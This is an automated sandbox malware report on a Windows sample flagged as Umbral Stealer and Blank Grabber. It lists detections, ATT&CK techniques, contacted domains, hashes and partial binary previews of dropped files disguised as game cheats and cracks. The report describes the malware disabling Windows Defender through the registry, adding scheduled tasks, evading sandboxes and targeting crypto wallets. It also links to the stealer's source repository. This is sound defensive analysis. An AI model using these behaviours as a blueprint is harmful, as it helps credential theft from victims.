                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity Information1
                            Scripting                            		Valid Accounts1
                            Windows Management Instrumentation                            		1
                            Scheduled Task/Job                            		11
                            Process Injection                            		11
                            Masquerading                            		1
                            Credential API Hooking                            		631
                            Security Software Discovery                            		Remote Services1
                            Credential API Hooking                            		1
                            Ingress Tool Transfer                            		Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts1
                            Command and Scripting Interpreter                            		1
                            Scripting                            		1
                            Scheduled Task/Job                            		1
                            Modify Registry                            		LSASS Memory1
                            Process Discovery                            		Remote Desktop Protocol1
                            Data from Local System                            		2
                            Non-Application Layer Protocol                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain Accounts1
                            Scheduled Task/Job                            		1
                            DLL Side-Loading                            		1
                            DLL Side-Loading                            		21
                            Disable or Modify Tools                            		Security Account Manager161
                            Virtualization/Sandbox Evasion                            		SMB/Windows Admin SharesData from Network Shared Drive12
                            Application Layer Protocol                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                            Bypass User Account Control                            		161
                            Virtualization/Sandbox Evasion                            		NTDS1
                            System Network Configuration Discovery                            		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                            Process Injection                            		LSA Secrets1
                            File and Directory Discovery                            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                            Obfuscated Files or Information                            		Cached Domain Credentials223
                            System Information Discovery                            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                            Timestomp                            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                            DLL Side-Loading                            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                            Bypass User Account Control                            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1545326 Sample: wKj1CBkbos.exe Startdate: 30/10/2024 Architecture: WINDOWS Score: 100 59 ip-api.com 2->59 61 fp2e7a.wpc.phicdn.net 2->61 63 2 other IPs or domains 2->63 67 Found malware configuration 2->67 69 Malicious sample detected (through community Yara rule) 2->69 71 Antivirus detection for dropped file 2->71 73 13 other signatures 2->73 9 wKj1CBkbos.exe 4 2->9         started        signatures3 process4 file5 51 C:\Users\user\...\Primordial Crack.exe, PE32 9->51 dropped 53 C:\Users\user\AppData\...\52cheatand52rat.exe, PE32 9->53 dropped 55 C:\Users\user\...\windows defender.bat, ASCII 9->55 dropped 91 Found many strings related to Crypto-Wallets (likely being stolen) 9->91 93 Creates files with lurking names (e.g. Crack.exe) 9->93 13 cmd.exe 1 9->13         started        16 Primordial Crack.exe 2 9->16         started        19 52cheatand52rat.exe 14 3 9->19         started        signatures6 process7 dnsIp8 95 Uses cmd line tools excessively to alter registry or file data 13->95 97 Uses schtasks.exe or at.exe to add and modify task schedules 13->97 22 reg.exe 1 1 13->22         started        25 reg.exe 1 1 13->25         started        27 reg.exe 1 1 13->27         started        36 18 other processes 13->36 49 C:\Users\user\AppData\...\Lunch LaCheatV2.exe, PE32 16->49 dropped 29 cmd.exe 1 16->29         started        31 Lunch LaCheatV2.exe 2 16->31         started        65 ip-api.com 208.95.112.1, 49711, 49758, 80 TUT-ASUS United States 19->65 99 Antivirus detection for dropped file 19->99 101 Multi AV Scanner detection for dropped file 19->101 103 Machine Learning detection for dropped file 19->103 34 WMIC.exe 1 19->34         started        file9 signatures10 process11 file12 75 Disables Windows Defender (deletes autostart) 22->75 77 Disable Windows Defender real time protection (registry) 22->77 79 Uses cmd line tools excessively to alter registry or file data 29->79 38 reg.exe 29->38         started        41 reg.exe 29->41         started        43 reg.exe 29->43         started        47 12 other processes 29->47 57 C:\Users\user\AppData\...\Lunch LaCheat.exe, PE32 31->57 dropped 81 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 31->81 83 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 31->83 85 Hides threads from debuggers 31->85 45 conhost.exe 34->45         started        signatures13 process14 signatures15 87 Disables Windows Defender (deletes autostart) 38->87 89 Disable Windows Defender real time protection (registry) 38->89

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            wKj1CBkbos.exe96%ReversingLabsByteCode-MSIL.Trojan.Umbral
                            wKj1CBkbos.exe100%AviraTR/Crypt.XPACK.Gen
                            wKj1CBkbos.exe100%Joe Sandbox ML

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\Users\user\AppData\Local\Temp\Primordial Crack.exe100%AviraTR/Crypt.XPACK.Gen
                            C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe100%AviraHEUR/AGEN.1307507
                            C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe100%AviraTR/Crypt.XPACK.Gen
                            C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe100%AviraTR/Crypt.XPACK.Gen
                            C:\Users\user\AppData\Local\Temp\Primordial Crack.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe84%ReversingLabsByteCode-MSIL.Trojan.UmbralStealer
                            C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe83%ReversingLabsWin32.Trojan.Vindor
                            C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe75%ReversingLabsWin32.Trojan.Vindor
                            C:\Users\user\AppData\Local\Temp\Primordial Crack.exe92%ReversingLabsWin32.Trojan.Dorv

                            Unpacked PE Files

                            No Antivirus matches

                            Domains

                            No Antivirus matches

                            URLs

                            SourceDetectionScannerLabelLink
                            http://crl.microsoft0%URL Reputationsafe
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                            http://ip-api.com/line/?fields=hosting0%URL Reputationsafe
                            http://ip-api.com0%URL Reputationsafe

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            bg.microsoft.map.fastly.net
                            		199.232.214.172
                            		truefalse
                              		unknown
                              ip-api.com
                              		208.95.112.1
                              		truetrue
                                		unknown
                                fp2e7a.wpc.phicdn.net
                                		192.229.221.95
                                		truefalse
                                  		unknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://ip-api.com/line/?fields=hostingfalse
                                  • URL Reputation: safe
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://github.com/Blank-c/Umbral-Stealer52cheatand52rat.exe.0.drfalse
                                    		unknown
                                    https://discord.com/api/v10/users/52cheatand52rat.exe.0.drfalse
                                      		unknown
                                      http://crl.microsoft52cheatand52rat.exe, 00000002.00000002.2218560821.000001BC1CA1E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name52cheatand52rat.exe, 00000002.00000002.2211105110.000001BC0437E000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://ip-api.com/json/?fields=225545wKj1CBkbos.exe, 52cheatand52rat.exe.0.drfalse
                                        		unknown
                                        http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-wKj1CBkbos.exe, 52cheatand52rat.exe.0.drfalse
                                          		unknown
                                          https://discordapp.com/api/v9/users/wKj1CBkbos.exe, 52cheatand52rat.exe.0.drfalse
                                            		unknown
                                            http://ip-api.com52cheatand52rat.exe, 00000002.00000002.2211105110.000001BC04409000.00000004.00000800.00020000.00000000.sdmp, 52cheatand52rat.exe, 00000002.00000002.2211105110.000001BC043F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            208.95.112.1
                                            		ip-api.comUnited States
                                            		53334TUT-ASUStrue

                                            General Information

                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1545326
                                            Start date and time:2024-10-30 12:36:10 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 4m 55s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:45
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:wKj1CBkbos.exe
                                            renamed because original name is a hash value
                                            Original Sample Name:E3A480A53D8B2C398A7642E1F4E84785.exe
                                            Detection:MAL
                                            Classification:mal100.troj.spyw.evad.winEXE@113/6@1/1
                                            EGA Information:Failed
                                            HCA Information:
                                            • Successful, ratio: 98%
                                            • Number of executed functions: 31
                                            • Number of non-executed functions: 3
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Stop behavior analysis, all processes terminated

                                            Warnings

                                            • Exclude process from analysis (whitelisted): dllhost.exe
                                            • Excluded IPs from analysis (whitelisted): 142.250.74.195, 20.109.210.53, 13.95.31.18
                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, gstatic.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                            • Execution Graph export aborted for target 52cheatand52rat.exe, PID 4420 because it is empty
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                            • VT rate limit hit for: wKj1CBkbos.exe

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            07:37:05API Interceptor1x Sleep call for process: WMIC.exe modified
                                            07:37:07API Interceptor1x Sleep call for process: 52cheatand52rat.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            208.95.112.1skuld3.exeGet hashmaliciousSkuld StealerBrowse
                                            • ip-api.com/line/?fields=hosting
                                            FixTsDfhiC.exeGet hashmaliciousBlank Grabber, DCRat, Umbral StealerBrowse
                                            • ip-api.com/line/?fields=hosting
                                            file.exeGet hashmaliciousWhiteSnake StealerBrowse
                                            • ip-api.com/line?fields=query,country
                                            Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                            • ip-api.com/line/?fields=hosting
                                            O3o5Xzk5Wd.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                            • ip-api.com/line/?fields=hosting
                                            bLaLoo4ET5.exeGet hashmaliciousQuasarBrowse
                                            • ip-api.com/json/
                                            sipari_.exeGet hashmaliciousAgentTeslaBrowse
                                            • ip-api.com/line/?fields=hosting
                                            Transferencia.docGet hashmaliciousQuasarBrowse
                                            • ip-api.com/json/
                                            SecuriteInfo.com.FileRepMalware.22561.28030.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                            • ip-api.com/json
                                            file.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWormBrowse
                                            • ip-api.com/line/?fields=hosting

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            ip-api.comskuld3.exeGet hashmaliciousSkuld StealerBrowse
                                            • 208.95.112.1
                                            FixTsDfhiC.exeGet hashmaliciousBlank Grabber, DCRat, Umbral StealerBrowse
                                            • 208.95.112.1
                                            file.exeGet hashmaliciousWhiteSnake StealerBrowse
                                            • 208.95.112.1
                                            Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                            • 208.95.112.1
                                            O3o5Xzk5Wd.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                            • 208.95.112.1
                                            bLaLoo4ET5.exeGet hashmaliciousQuasarBrowse
                                            • 208.95.112.1
                                            sipari_.exeGet hashmaliciousAgentTeslaBrowse
                                            • 208.95.112.1
                                            Transferencia.docGet hashmaliciousQuasarBrowse
                                            • 208.95.112.1
                                            https://link.edgepilot.com/s/b064b0de/7_W48d8I8kGlXhrfD-hDUg?u=https://delivmodas.ks.infinitoag.com/Get hashmaliciousUnknownBrowse
                                            • 51.195.5.58
                                            SecuriteInfo.com.FileRepMalware.22561.28030.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                            • 208.95.112.1
                                            fp2e7a.wpc.phicdn.nethttps://storage.googleapis.com/inbound-mail-attachments-prod/5e015eec-2063-4653-b543-a2fdc4c2725e?GoogleAccessId=distribution-controller-prod@inbound-mail-attachments.iam.gserviceaccount.com&Expires=1761388993&Signature=Oqe%2BJFHcrdG7YCkrE3C6Zz6OLCYLhBuVvPPylkjCYGmey41qx66XjqVVSGCLAMzo5SzdjLX9iaWGDKggE5%2BSVyTp%2B4Pp9hiCYEhCbzJzRObttu74xvBHPG1HUvGwyhKfE3KbJMo6s3eIKayqjRRl9ive1ntsdNaFkXskMlbkDDitCjrgmc09BMh3GNgCZmS%2B%2F6W4Hs1%2FBX1s3JEpbIGaBotrI7KKcK%2Bk0eqEvy1FwgCCaSUDTZl1b6RyonBWqWQVoOT9UDFVSH5CfVKF4DfFfka0acdeYb2Y34WyRy8cCZlWDImJo52Hcg2wugU%2BJragJQbGJ2SdK6G4yy3Ak%2BGX%2FQ%3D%3DGet hashmaliciousUnknownBrowse
                                            • 192.229.221.95
                                            https://storage.googleapis.com/inbound-mail-attachments-prod/e5020188-2749-47cf-83bf-a0b2cfddec50?GoogleAccessId=distribution-controller-prod@inbound-mail-attachments.iam.gserviceaccount.com&Expires=1761388993&Signature=IYvTnHOaJB29ajuWwRzQZcQU4rHZgE4%2B0wJhDBuFNmuqKnq%2FuPwCZP2MuJNgfzc77Ulb%2FJD3hwjlmSZShLzm0rPz6kKzhOLxOsUrI2XaeGtr6VKv39d0yW57ZIaLvLuZqvMWrfmHg%2BzUtv%2BcuDdwfra8VzLrHRqbhPzwLmtaXc5jZiVHr4MEAQCaBOGAv%2B6DE6yQ7c%2FlukBVx7jSavZDJXhjDk6sOF%2BQSM%2FK%2FuwwWji%2BW4LjRMFJenK4rl5ERz3yHGgV62NnKzG9uQEgFU1Iv%2B0bvdTtYnW7CWjAkQzlPAI6yDTeVaqoZiiX%2FlEIegTw1eda8%2FOtpMB8OmgtqhxecQ%3D%3DGet hashmaliciousUnknownBrowse
                                            • 192.229.221.95
                                            https://draxcc.com/Get hashmaliciousUnknownBrowse
                                            • 192.229.221.95
                                            http://xn--gba7iaacaabba0ab51nca04ecacdad9203oearjjb191bfa.mkto-sj030022.comGet hashmaliciousUnknownBrowse
                                            • 192.229.221.95
                                            https://volmesappliant.com/postback?cid=%7Bcid%7D&payout=payout&currency=OPTIONAL&txid=txid&et=ftdGet hashmaliciousUnknownBrowse
                                            • 192.229.221.95
                                            http://timecode.com.ar/Webmail/2/Webmail/webmail.php?email=gc@virtualintelligencebriefing.comGet hashmaliciousHTMLPhisherBrowse
                                            • 192.229.221.95
                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                            • 192.229.221.95
                                            https://trvelocity.petra-dee.org/index.php/campaigns/ao946pbrfq631/track-url/lk782m0eyna84/24e9f9ecc31181de7c43e9793836ee263a7fcd94%20%20office365_event_type%20alertGet hashmaliciousUnknownBrowse
                                            • 192.229.221.95
                                            DHL TRACKING.exeGet hashmaliciousFormBookBrowse
                                            • 192.229.221.95
                                            O3o5Xzk5Wd.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                            • 192.229.221.95
                                            bg.microsoft.map.fastly.nethttps://storage.googleapis.com/inbound-mail-attachments-prod/5e015eec-2063-4653-b543-a2fdc4c2725e?GoogleAccessId=distribution-controller-prod@inbound-mail-attachments.iam.gserviceaccount.com&Expires=1761388993&Signature=Oqe%2BJFHcrdG7YCkrE3C6Zz6OLCYLhBuVvPPylkjCYGmey41qx66XjqVVSGCLAMzo5SzdjLX9iaWGDKggE5%2BSVyTp%2B4Pp9hiCYEhCbzJzRObttu74xvBHPG1HUvGwyhKfE3KbJMo6s3eIKayqjRRl9ive1ntsdNaFkXskMlbkDDitCjrgmc09BMh3GNgCZmS%2B%2F6W4Hs1%2FBX1s3JEpbIGaBotrI7KKcK%2Bk0eqEvy1FwgCCaSUDTZl1b6RyonBWqWQVoOT9UDFVSH5CfVKF4DfFfka0acdeYb2Y34WyRy8cCZlWDImJo52Hcg2wugU%2BJragJQbGJ2SdK6G4yy3Ak%2BGX%2FQ%3D%3DGet hashmaliciousUnknownBrowse
                                            • 199.232.210.172
                                            https://storage.googleapis.com/inbound-mail-attachments-prod/e5020188-2749-47cf-83bf-a0b2cfddec50?GoogleAccessId=distribution-controller-prod@inbound-mail-attachments.iam.gserviceaccount.com&Expires=1761388993&Signature=IYvTnHOaJB29ajuWwRzQZcQU4rHZgE4%2B0wJhDBuFNmuqKnq%2FuPwCZP2MuJNgfzc77Ulb%2FJD3hwjlmSZShLzm0rPz6kKzhOLxOsUrI2XaeGtr6VKv39d0yW57ZIaLvLuZqvMWrfmHg%2BzUtv%2BcuDdwfra8VzLrHRqbhPzwLmtaXc5jZiVHr4MEAQCaBOGAv%2B6DE6yQ7c%2FlukBVx7jSavZDJXhjDk6sOF%2BQSM%2FK%2FuwwWji%2BW4LjRMFJenK4rl5ERz3yHGgV62NnKzG9uQEgFU1Iv%2B0bvdTtYnW7CWjAkQzlPAI6yDTeVaqoZiiX%2FlEIegTw1eda8%2FOtpMB8OmgtqhxecQ%3D%3DGet hashmaliciousUnknownBrowse
                                            • 199.232.214.172
                                            401K .pdfGet hashmaliciousHTMLPhisherBrowse
                                            • 199.232.210.172
                                            Biocon-In-Service Agreement.pdfGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                            • 199.232.214.172
                                            https://draxcc.com/Get hashmaliciousUnknownBrowse
                                            • 199.232.210.172
                                            http://xn--gba7iaacaabba0ab51nca04ecacdad9203oearjjb191bfa.mkto-sj030022.comGet hashmaliciousUnknownBrowse
                                            • 199.232.210.172
                                            98761598741965.pdfGet hashmaliciousUnknownBrowse
                                            • 199.232.214.172
                                            http://timecode.com.ar/Webmail/2/Webmail/webmail.php?email=gc@virtualintelligencebriefing.comGet hashmaliciousHTMLPhisherBrowse
                                            • 199.232.210.172
                                            z1Transaction_ID_REF2418_cmd.batGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                            • 199.232.210.172
                                            Orden de Compra.xlam.xlsxGet hashmaliciousUnknownBrowse
                                            • 199.232.214.172

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            TUT-ASUSskuld3.exeGet hashmaliciousSkuld StealerBrowse
                                            • 208.95.112.1
                                            FixTsDfhiC.exeGet hashmaliciousBlank Grabber, DCRat, Umbral StealerBrowse
                                            • 208.95.112.1
                                            file.exeGet hashmaliciousWhiteSnake StealerBrowse
                                            • 208.95.112.1
                                            Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                            • 208.95.112.1
                                            O3o5Xzk5Wd.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                            • 208.95.112.1
                                            bLaLoo4ET5.exeGet hashmaliciousQuasarBrowse
                                            • 208.95.112.1
                                            sipari_.exeGet hashmaliciousAgentTeslaBrowse
                                            • 208.95.112.1
                                            Transferencia.docGet hashmaliciousQuasarBrowse
                                            • 208.95.112.1
                                            SecuriteInfo.com.FileRepMalware.22561.28030.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                            • 208.95.112.1
                                            file.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWormBrowse
                                            • 208.95.112.1

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeFixTsDfhiC.exeGet hashmaliciousBlank Grabber, DCRat, Umbral StealerBrowse
                                              C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeFixTsDfhiC.exeGet hashmaliciousBlank Grabber, DCRat, Umbral StealerBrowse
                                                C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeFixTsDfhiC.exeGet hashmaliciousBlank Grabber, DCRat, Umbral StealerBrowse

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\52cheatand52rat.exe.log

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe
                                                  File Type:CSV text
                                                  Category:dropped
                                                  Size (bytes):1492
                                                  Entropy (8bit):5.3787668257697945
                                                  Encrypted:false
                                                  SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhwE4ksKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6owHptHTHf
                                                  MD5:761D1106534DF52590D691CAD8962C57
                                                  SHA1:D3678D8F8635FF85D354F7EE2FFC24008357DC5B
                                                  SHA-256:73784F8EEA9F790E13C7DA5137D0735B161D974DE8F748ABFD4A3951CE91FAB2
                                                  SHA-512:AA3595F2936C95C599C6E8C2784CA18FDC7DE34F290D38B56FCC52D82CDCBF002EAE0BB16DD6355DC8AD85F6DCC69246FD3D07274A49C9914F4769F256BA16ED
                                                  Malicious:false
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System

                                                  C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\wKj1CBkbos.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):235008
                                                  Entropy (8bit):6.052066943195521
                                                  Encrypted:false
                                                  SSDEEP:6144:tloZM+rIkd8g+EtXHkv/iD4OUCKbhS6FOAxDeebn4b8e1mSTi:voZtL+EP8OUCKbhS6FOAxDeebAo
                                                  MD5:06129FFC46E854930CFCAA754CA1D487
                                                  SHA1:E7C173C48AA107EC63BD6F9030C9EC6FE889D832
                                                  SHA-256:10D28E18A7DF4B2C30E05E5E361F1724E0B6EA8C021D8105EE30354BE79B98D1
                                                  SHA-512:B7121A2A65F317EDBC1B4DD8DEC427C277FAD2B521A211D1408BC06B79431C418DAD32ED61481C5EF49511CD167846E026A86147AE77BD9B0E607918FEB66AB9
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, Author: Joe Security
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, Author: ditekSHen
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 84%
                                                  Joe Sandbox View:
                                                  • Filename: FixTsDfhiC.exe, Detection: malicious, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.a..........."...0.................. ........@.. ....................................`.................................@...K.......P...........................$................................................ ............... ..H............text........ ...................... ..`.rsrc...P...........................@..@.reloc..............................@..B................p.......H.......@...........6.....................................................{....*..{....*V.(......}......}....*...0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. ... )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*...0..w.............%.o...(.........~....s..........]..........~.....".".~.....\.\.~......b.~.......f.~.......n.~.......r.~...

                                                  C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):7888384
                                                  Entropy (8bit):7.978075960572594
                                                  Encrypted:false
                                                  SSDEEP:196608:i9FITY7Wgr4pQTsRB/DejGIKpj57IOTj0cnue:4FN96LRB/DejGHtIOTofe
                                                  MD5:B76057DF968A944446F950DD4DDC6AEC
                                                  SHA1:BB64DE1C677368764000D34C29528EAD2F48405C
                                                  SHA-256:AFE91FEA04D39DE5710AD065252D13B9DF7B7BD25788DDF5AFB162A2F0A03296
                                                  SHA-512:7F45198FE05013CEAB477784BDE2B1C4532607BD8BA8D9CFB09C5BB037DD2616086C8CB3AFD669B24EC89EEDBD270D00F1BD6BCE2644B40ED36B8F32FC5FDB31
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                  Joe Sandbox View:
                                                  • Filename: FixTsDfhiC.exe, Detection: malicious, Browse
                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........PE..L....^B*.....................r.......|K......0....@..........................0O..................@.................../.O....6..............................................................45.......................G.x...........................CODE................................ ..`DATA....|....0......................@...BSS..........@...........................idata.......P......................@....tls.........`...........................rdata.......p......................@..P.vmp0....J..........................`..`.vmp1....Xx......Zx.................`..`.....................................................................................................................................................$..............@..P........................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\Temp\Primordial Crack.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):13304832
                                                  Entropy (8bit):7.991054831548809
                                                  Encrypted:true
                                                  SSDEEP:393216:aJlQ1evI2bs6Yuno3rkJ3InoKasOnHDJaM8:abQpgssCKInwjJaM
                                                  MD5:7DB5128F7A81CC1AF094D8898E79FF21
                                                  SHA1:D503984331D5999C14931C267D859FBD1510C282
